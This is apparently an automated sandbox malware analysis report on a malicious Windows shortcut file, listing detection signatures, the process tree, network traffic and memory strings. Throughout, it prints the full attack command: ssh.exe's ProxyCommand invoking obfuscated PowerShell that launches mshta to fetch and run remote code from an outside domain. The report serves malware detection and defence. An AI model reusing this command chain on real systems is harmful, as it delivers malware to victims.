Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HngJMpDqxP.lnk

Overview

General Information

Sample name:HngJMpDqxP.lnk
renamed because original name is a hash value
Original sample name:c90cd850078a3688894afc507e6b9ce8.lnk
Analysis ID:1582823
MD5:c90cd850078a3688894afc507e6b9ce8
SHA1:7f9a31f6fef0350c319380e367e7f612f3ecce14
SHA256:70f3b05eb07d9af8dddbd9b5a0aa2e27bf4feda3bef1d4c1b50aaa4c722a1050
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Lolbin Ssh.exe Use As Proxy
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • ssh.exe (PID: 6408 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 2632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4856 cmdline: powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://klipzynigou.shop/An4me.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 6096 cmdline: "C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 2544 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://klipzynigou.shop/An4me.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6788, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4, ProcessId: 6096, ProcessName: mshta.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" ., ProcessId: 6408, ProcessName: ssh.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40), CommandLine: powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 6408, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40), ProcessId: 4856, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2544, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://klipzynigou.shop/An4me.mp4Avira URL Cloud: Label: malware
Source: HngJMpDqxP.lnkVirustotal: Detection: 32%Perma Link
Source: HngJMpDqxP.lnkReversingLabs: Detection: 31%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.2% probability
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /An4me.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: klipzynigou.shopConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1Accept: */*Referer: https://klipzynigou.shop/An4me.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: klipzynigou.shopConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Accept: */*Referer: https://klipzynigou.shop/An4me.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: klipzynigou.shopConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /An4me.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: klipzynigou.shopConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1Accept: */*Referer: https://klipzynigou.shop/An4me.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: klipzynigou.shopConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Accept: */*Referer: https://klipzynigou.shop/An4me.mp4Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: klipzynigou.shopConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: klipzynigou.shop
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 31 Dec 2024 14:41:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5om3NfZWMUo%2BVpO29cMNIZFag%2B6iIRnXolkfymaae691alAt%2B9mWIQarL1KBn8M2IBal4P9UJsTM%2FI7cwFXriFQghoqgH0YYkJRMP%2F97OaUt%2Bp%2Bnl%2B5IAcqQYtS00HC0ymAM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fab0858a929437e-EWR
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
Source: svchost.exe, 00000007.00000002.3606850826.0000023513C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.2394149079.000001768A0B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2394149079.000001768A0D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000004.00000002.2394149079.000001768A103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000007.00000003.2422301015.0000023513A40000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/1
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEC5000.00000004.00000020.00020000.00000000.sdmp, HngJMpDqxP.lnkString found in binary or memory: https://klipzynigou.shop/An4me.mp4
Source: powershell.exeString found in binary or memory: https://klipzynigou.shop/An4me.mp4$global:?
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4)
Source: mshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4-2
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4;J
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4C:
Source: mshta.exe, 00000005.00000002.3604926028.000001AA7D0D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4H
Source: mshta.exe, 00000005.00000002.3606198465.000001B27EDC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4Hi
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4I
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4a
Source: mshta.exe, 00000005.00000002.3610369186.000001B27FD55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4https://klipzynigou.shop/An4me.mp4
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4mJ
Source: powershell.exe, 00000004.00000002.2394149079.000001768A091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4p
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4tJ
Source: powershell.exe, 00000004.00000002.2394044056.0000017689BB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4v
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4y
Source: mshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4yles/cf.errors.css
Source: mshta.exe, 00000005.00000002.3604956103.000001AA7D0E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4ystem32
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/An4me.mp4z
Source: mshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3602683080.000001AA042F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CF56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637.
Source: mshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637:
Source: mshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637N
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637P3
Source: mshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637R
Source: mshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637l
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/cdn-cgi/phish-bypass
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/cdn-cgi/phish-bypass:g
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/cdn-cgi/phish-bypasse
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/cdn-cgi/phish-bypasss
Source: mshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/cdn-cgi/styles/cf.errors.css
Source: mshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipzynigou.shop/cdn-cgi/styles/cf.errors.cssU
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: mshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3604352911.000001AA7CF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing:
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CF56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingnagement/phishing-attack/
Source: mshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingy
Source: mshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3604352911.000001AA7CF67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/a
Source: mshta.exe, 00000005.00000002.3608242705.000001B27FBDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/tD
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49718 version: TLS 1.2

System Summary

barindex
Source: HngJMpDqxP.lnkLNK file: -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" .
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD33DD27954_2_00007FFD33DD2795
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD33DD20ED4_2_00007FFD33DD20ED
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal76.winLNK@9/11@1/2
Source: C:\Windows\System32\OpenSSH\ssh.exeFile created: C:\Users\user\.sshJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5odwgj3q.p55.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: HngJMpDqxP.lnkVirustotal: Detection: 32%
Source: HngJMpDqxP.lnkReversingLabs: Detection: 31%
Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" .
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://klipzynigou.shop/An4me.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://klipzynigou.shop/An4me.mp4"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
